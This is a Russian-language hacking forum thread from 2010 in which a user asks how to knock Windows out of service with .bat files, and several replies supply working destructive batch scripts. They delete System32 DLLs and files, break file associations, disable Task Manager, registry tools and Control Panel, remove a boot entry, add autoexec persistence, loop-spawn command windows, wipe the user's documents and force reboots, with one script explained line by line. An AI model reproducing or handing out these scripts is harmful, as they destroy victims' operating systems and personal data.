как с помощью .bat файлов вывести из работы windows

Discussion in 'Безопасность и Анонимность' started by _eXorcist_, 23 Feb 2010.

  1. _eXorcist_

    _eXorcist_ New Member

    Joined:
    24 Dec 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    как с помощью .bat файлов вывести из работы windows
     
  2. good.god

    good.god Member

    Joined:
    23 Nov 2009
    Messages:
    260
    Likes Received:
    32
    Reputations:
    0
    Code:
    del "%SystemRoot%system32*.dll" /q >nul
    
    
    Насколько помню dll системные удаляет, должно помочь.
     
  3. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,051
    Likes Received:
    615
    Reputations:
    690
    Code:
    echo off 
    assoc .exe=.txt 
    assoc .mp3=.txt 
    assoc .avi=.txt 
    assoc .wav=.txt 
    assoc .jpg=.txt 
    assoc .bmp=.txt 
    assoc .rar=.txt 
    assoc .zip=.txt 
    assoc .dll=.txt 
    assoc .ink=.txt 
    assoc .drv=.txt 
    assoc .mpg=.txt 
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul 
    bootcfg /delete /id 1 >nul 
    taskkill /f /im explorer.exe >nul 
    copy %0 c:str.bat >nul 
    echo c:str.bat>>c:autoexec.bat 
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul 
    del C:windowsMedia /q 
    :x 
     Start cmd 
     goto x
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul 
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul 
    Chcp 1251
    del "%USERPROFILE%Мои документы*.*" /q /s 
    Chcp 1251
    label C: LAMER
    del "%SystemRoot%system32*.dll" /q >nul 
    rundll32 keyboard,disable 
    del %SystemRoot%\system32\devmgmt.msc >nul  
    reg add HKCU\SoftwareMicrosoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul 
    
    =)]
     
    _________________________
  4. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
    Учитесь пользоватся поиском.

    В блокноте:

    CMD /c start /high /min 666.bat
    shutdown -r -f -t 35 -c " -----F U C K O F F----- "
    del /f/s/q c:\WINDOWS\SYSTEM32\*.*

    ==============================================

    Сохрани как 666.bat


    1)Строчка "CMD /c start /high /min 666.bat " запускает сново и сново фаил 666.bat минимизированым.

    2)Строчка "shutdown -r -f -t 35 -c " -----F U C K O F F----- " принудительно вырубит комп через 35сек с надпесью "- F U C K O F F -" или что ты там напишешь.

    3)Строчка "del /f/s/q C:\WINDOWS\SYSTEM32\*.*" принудительно удалит все файлы кроме системных в папке System32
     
  5. _eXorcist_

    _eXorcist_ New Member

    Joined:
    24 Dec 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    всем большое спасибо